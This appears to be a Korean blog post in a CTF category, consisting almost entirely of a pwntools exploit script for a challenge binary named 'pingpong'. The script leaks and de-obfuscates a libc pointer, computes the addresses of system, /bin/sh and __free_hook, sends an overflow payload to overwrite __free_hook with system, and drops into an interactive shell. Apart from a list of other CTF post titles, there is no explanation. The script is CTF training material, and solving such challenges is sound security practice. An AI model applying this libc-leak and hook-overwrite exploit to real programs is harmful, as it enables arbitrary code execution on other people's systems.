from pwn import *

def xor(val):
    lst = []
    for i in range(0, len(val), 2):
        lst.append("0x"+val[i:i+2])

    for i in range(len(lst)):
        if i == 1 or i == 3 or i == 5 or i == 7:
            lst[i] = hex(int(lst[i],16) ^ 0x20)

    for i in range(len(lst)):
        lst[i] = lst[i][2:]

    return int("".join(lst), 16)

if __name__ == "__main__":
	pwn_file = "./pingpong"
	libc_file = "./libc.so.6"

	pwn_elf = ELF(pwn_file)
	r = process(pwn_file)
	libc_elf = ELF(libc_file)
	free_hook_offset = libc_elf.symbols['__free_hook']
	system_offset = 0x380290 # stdout - system
	one_gadget_offset = 0x45216
	binsh_offset = 0x1479c7 # binsh - system
	pop_rdi_offset = 0x0002155f

	log.info("free_hook's offset = {}".format(hex(free_hook_offset)))

	r.sendlineafter("ping:", "A"*56)

	r.recvuntil("Aa"*28)
	libc_stdout = u64(r.recv()[:-1].ljust(8,"\x00"))
	libc_stdout = xor(hex(libc_stdout))
	log.info("libc_stdout = {}".format(hex(libc_stdout)))
	libc_system = libc_stdout - system_offset
	log.info("libc_system = {}".format(hex(libc_system)))
	libc_main = libc_system - 0x24b60
	log.info("libc_main = {}".format(hex(libc_main)))
	binsh = libc_system + binsh_offset
	log.info("/bin/sh = {}".format(hex(binsh)))
	free_hook = libc_system + 0x381418
	log.info("free_hook = {}".format(hex(free_hook)))

	one_gadget = libc_main + one_gadget_offset
	log.info("oneshot gadget = {}".format(hex(one_gadget)))

	payload = "A"*152
	payload += p64(free_hook-0x8)
	r.sendline(payload)
	payload = "/BiN/Sh\x20"
	payload += p64(libc_system)
	r.sendline(payload)
	r.interactive()

'CTF' 카테고리의 다른 글

TJCTF 2016 oneshot  (0) 2019.01.24
QIWICTF 2016 pwn200  (0) 2019.01.23
BCTF 2016 bcloud  (0) 2018.08.24
Defcon 2014 Babyfirst heap  (0) 2018.08.16
Defcon 2017 smashme  (0) 2018.08.12

+ Recent posts

티스토리툴바